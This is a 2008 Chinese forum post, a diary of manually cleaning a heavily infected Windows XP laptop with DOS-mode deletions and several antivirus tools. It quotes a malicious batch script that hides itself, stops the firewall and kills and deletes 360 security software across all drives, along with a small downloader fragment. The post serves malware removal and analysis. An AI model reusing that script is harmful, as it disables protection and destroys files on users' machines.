|
初生襁褓狮
|
发表于:
2008-09-03 00:49
|
只看楼主
短消息
资料
记一次10个小时的病毒查杀日记
今天是2008年9月2日,天气晴,坐在办公室清理了一天木马和病毒,用了接近10个小时,从上午9:00开始-到晚上5:00,大功告成。单位同事笔记本中毒,今天拿来让我帮看看。说实在中毒颇深,重新做系统是最好的办法。不过还是手动清理+工具清理最后成功干掉了病毒和木马程序。以下是分析报告,由于病毒木马破坏严重不能使用windows画图工具,非常遗憾。
症状:一、无论是进入安全模式还是正常模式都会出现弹出错误窗口,即,debug.exe 应用程序错误,sspipes.scr 应用程序错误,rundll32.exe 应用程序错误,drwtsn32.exe 应用程序错误,svchost.exe应用程序错误,ctfmon.exe应用程序错误,wmiprvse.exe应用程序错误,wdfmgr.exe应用程序错误。更为糟糕是关也关不掉,鼠标点了一上午,差点没把鼠标点碎了。二、所有应用程序,包括可执行程序EXE文件,COM文件,TXT文件等关闭启动不了,任务管理器打不开,打开文件夹也报错。开始--运行--输入任何命令没有反映,不能使用卸载功能,不
能进入控制面板。IE浏览器不能正常打开网页,IE主页被锁定,IE属性被报错。不能安装任何工具软件及杀毒软件,进行以上操作的时候,debug.exe和drwtsn32.exe 程序频繁报错关也关不掉。比较庆幸的是安全模式能进入,最起码不蓝屏,但是还是不能阻止报错。记得以前清理机器狗和新AV终结者的时候,也没有今天这么费劲,上次的AV和机器狗中毒的时候症状是进入安全模式蓝屏,不能打开进程管理器,打开IE和文件夹都被关闭。杀毒软
件和常用工具软件打开马上被关闭。相比两次中毒既有相同点,也有不同点这里就不说了。
初步分析:首先进入安全模式,打开C盘(debug.exe和drwtsn32.exe 不挺弹出应用程序错误)不停的关,鼠标点了N下关掉了。发现在C盘根目录下有mahtesf3.bat文件,在正常模式下无论用什么方式都打不开。进入windows目录发现有hosts文件不用说这肯定有问题,正常该文件不是在这里,winodws目录下还有 lezq.exe rqeh.exe murc.exe umnq.exe 一看就是病毒和木马,初步怀疑是下载器。进入SYSTEM32目录又报错,继续关闭debug.exe和drwtsn32.exe弹出的应用程序错误。在system32下发现有一个cmd.bat文件,不用想打不开,有人说先修复文件关联,手动编辑一个REG文件,然后导入,都用了可是不行报错。命令提示符窗口都打不开。这时候,我用详细列表查看文件创建时间,要最近日期的,发现kncer30.dll kcoud32.dll kcodu.dll kcodu32.exe c8.jpg.exe可疑,这时候又出现新的报错,出现 kncer30.exe 应用程序错误。又关了N次,本想用F3查找hosts文件,可惜也报错。哎!!现在唯一的办法是进入DOS模式,手动编辑或删除病毒文件。重新启动计算机,进入矮人DOS工具箱,进入DOS模式,首先进入windows目录把lezq.exe rqeh.exe murc.exe umnq.exe hosts这几个文件比较好删除,可以用DEL命令,但是进入SYSTEM32后想删除CMD.BAT就不行,
首先EDIT cmd.bat发现以下代码:
@echo off
set s=taskkill
copy %0 %windir%\system\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im 360.* /f >nul
%s% im RStray /f >nul
net stop shadow " "system" "service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a :360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a :修复* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a :Rstray* /f /s /q >nul
这个批处理主要是干掉360安全卫士的。很容易理解就不说了。如果我们把该代码删除,在保存,实话告诉你,不行的。用DEL命令也删除不掉
,必须用deltree命令删除。接着删除kncer30.dll kcoud32.dll kcodu.dll kcodu32.exe c8.jpg.exe,explore.exe rmcxmpk.exe mssetdk.exe micsusk.exe rmbsonyk.exe等文件。也要用DELTREE命令。然后我们回到C盘根目录,也用EDIT命令编辑mahtesf3.bat ,发现如下
代码:
:Repeat1
del "c:\docume~1/new\locals~1/temp\ko.exe"
if exits "c:\docume~1/new\locals~1/temp\ko.exe" goto repeat1
cd c:\
del %0
这个应该是一个木马病毒下载器,在DOS模式进入"c:\docume~1/new\locals~1/temp 目录用DEL命令删除,报错"this program cannot bu run in dos mode"由于该文件是隐藏文件必须用attirb +h +s +r 然后在用DELTREE删除。
因为这是还有debug.exe和drwtsn32.exe两文件在不停报错,所以我们用ren命令把报错的文件的后缀改成TXT,或其他文件后缀,只要不是EXE和COM就可以,然后重新启动计算机。发现debug.exe和drwtsn32.exe报错停止。多少自己看起来也舒服些,这时突然rundll32.exe 应用程序错误。晕!!刚送走了debug.exe和drwtsn32.exe又来了rundll32.exe和ctfmon.exe,这里用同样的方法先把ctfmon.exe下DOS模式下改后缀。rundll32.exe报错我们用鼠标不停的点确定或取消。影响没有前2个程序大。这时如果安全任何工具软件都不行。不过能使用CMD和regeit了,但是regedit打开后,就停止响应了。先停止这边的工作,先考虑修复IE,用了很多工具发现都运行不了,最后发现工具“强悍的流氓软件免疫及IE修复、锁定工具” 这个软件可以运行,就先修复IE,发现IE主页改回来了。可以百度,但是打不开任何连接,当点击连接时候rundll32.exe报错。后来用另一台机器上网找了一下几个木马文件看看什么来历,原来应用程序错误是“重写器变种M(Rootkit.Win32.RESSDT.m),这是个Rootkit病毒驱动
, 通常与其它盗号木马病毒结合传播。该驱动运行之后,可以通过用户层计算出来的服务函数地址和索引,在驱动层恢复SSDT(系统服务描述符表),这样可以使某些反病毒软件的自我保护和监控失效。杀毒软件失效之后,别的病毒和木马就可以对系统进行肆意破坏,从而给用户带来损失。kncer30.exe 这个文件及其相关的文件都是重写器变种,与其相关的 debug.exe drwtsn32.exe explore.exe ctfmon.exe 等文件在DOS下看都是08-08-04 4:00创建的。这时又在DOS下删除一些陌生文件,这时可以在cmd下修复EXE和com 还有TXT文件关联。不过效果不大,还是rund32.dll报错。用U盘到另一台机器上下载了360安全卫士,金山清理专家,恶意软清理这时,AUTO.EXE专杀工具,很多工具能打开,但是打开后马上rund32.dll报错崩溃然后退出。最后发现windows 清理助手可以运行,虽然也报错,但是可以查杀,程序不自动退出,暂且把报错信息窗口放一边去,因为我事先已经在另一台机器上升级完windows 清理助手的查杀引擎。这样就可以直接查杀了。众多工具,只有这一个工具可以勉强启动运行。由于病毒破坏系统严重,画图工具使用不了,所以不能抓图,但是我记下了以下查杀木马和病毒的文件名称。
第一次查杀:
系统重要文件被替换, c:\windows\system32\comctl32.dll
拒绝访问对象 c:\windows\system32\drivers\hbkernel.yss
Trojan.msetole
Trojan.myusemt
Trojan.adyoyo.mrrsfo
Trojan.dpvvoxmh
Trojan.msiffei.abir
Trojan.inityuser.go10
Trojan.ytewcxzsw.wrew2ds
Trojan.usmsvc.telem
Trojan.wlctr32.rntime3
trojan.wrqszl.zgxfdx
Trojan.hbkernel
Trojan.winsp.tdffdl
Trojan.msosiocp.dosjisn
Trojan files 2
Trojan.banner.sa
Trojan.must.rds
Trojan.psw.avx
插件:中文上网,百度超级搜霸,中文搜搜,拷贝搜
piaoxue/feixue
my123
IEXPLORER木马
G_SERVER
37SS
恶意插件就不用说了,这里还有灰鸽子,飘雪,MY123等都非常有名气的。经过第一次查杀后,大部分应用程序可以正常运行了。在进入DOS模式,把刚才改的那几个文件的后缀改回来,但是发现该文件已经不在了,于是用系统dllcache目录里的备份文件copy过去。OK.这时重新启动计算机。
第二次查杀:用恶意软件清理助手和windows 清理助手综合查杀,两个软件又分别查杀出不同的插件、木马和病毒。点击查杀,然后重新启动计算机,这时后机器中的费尔托斯特安全杀毒软件可以启动了,用它修复映像劫持等很多项目,然分别安装360和金山清理专家,又分别查杀出不同的木马和病毒,在用超级兔子清理临时文件,COOKIES,清理注册表病毒木马残余键值。重新启动计算机。然后在用专杀工具查杀,新AV,机器狗,磁碟机,顽固木马专杀大全等查杀。因为费尔托斯特安全已经过期不能升级,所以安装瑞星和卡卡助手,并卸载费尔托斯特安全,瑞星又查杀出22的病毒和木马。有QQ盗号,网游盗号。最重要的一个就是“梅勒斯(Trojan.DL.Mnless) ”木马病毒变种,是一个Rootkit木马病毒很难清理。在安全模式下又查杀一次,最后又查2个病毒。病毒木马的副本已经被我打上压缩包,准备日后用OllyDBG分析一下,这时也把卡卡助手弄上来查杀和清理一下。最后用超级兔子来一个系统优化清理。现在病毒木马终于清理掉了。用了快10个小时的时间,本文仅仅是一次查杀日记,有很多不足之处,大家请谅解。
###-版权所有人Trojan.ydb.H-####
http://wenwen.soso.com/z/c321454080.htm?ch=w.gr.fl
|
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.59 http://bsalsa.com/ EmbeddedWB- 14.59 from: http://bsalsa.com/ )
|
